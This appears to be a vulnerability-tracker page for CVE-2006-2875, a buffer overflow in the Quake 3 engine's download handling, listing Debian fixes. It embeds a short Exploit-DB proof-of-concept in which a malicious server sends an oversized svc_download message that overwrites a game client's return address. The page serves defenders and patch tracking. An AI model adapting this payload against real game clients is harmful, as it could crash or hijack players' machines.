CVE-2006-2875

unknown

Published — · Modified —

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

Stack-based buffer overflow in the CL_ParseDownload function of Quake 3 Engine 1.32c and earlier, as used in multiple products, allows remote attackers to execute arbitrary code via a svc_download command with compressed data that triggers the overflow during expansion.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-27969 dos multiple verified text · 1 KB

Luigi Auriemma · 2006-06-05

Quake 3 Engine - 'CL_ParseDownload' Remote Buffer Overflow

text exploit Source: Exploit-DB

// source: https://www.securityfocus.com/bid/18271/info
// 
// The Quake 3 engine is susceptible to a remote buffer-overflow vulnerability. This issue is due to the application's failure to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer.
// 
// Remote attackers may exploit this issue to execute arbitrary machine code in the context of affected game clients. Failed exploit attempts will likely crash affected clients.
// 
// Quake 3 version 1.32c and Icculus.org Quake 3 revision 795 are vulnerable to this issue; other versions may also be affected. The affected game engine has been used to create many derivative games, which may also be affected.
// 

// send the gamestate
int i;
MSG_WriteByte( &msg, svc_download );
MSG_WriteShort( &msg, -1 ); // block != 0, for fast return
MSG_WriteShort( &msg, 16384 + 32 ); // amount of bytes to copy
for(i = 0; i < 16384; i++) { // overwrite the data buffer
MSG_WriteByte(&msg, 0x00); // 0x00 for saving space
}
for(i = 0; i < 32; i++) { // do the rest of the job
MSG_WriteByte(&msg, 'a'); // return address: 0x61616161
}
SV_SendMessageToClient( &msg, client );
return;

OS impact

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`1.36+svn1788j-1`
sid	Fixed	`1.36+svn1788j-1`
forky	Fixed	`1.36+svn1788j-1`
bullseye	Fixed	`1.36+svn1788j-1`
bookworm	Fixed	`1.36+svn1788j-1`

References

https://security-tracker.debian.org/tracker/CVE-2006-2875

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.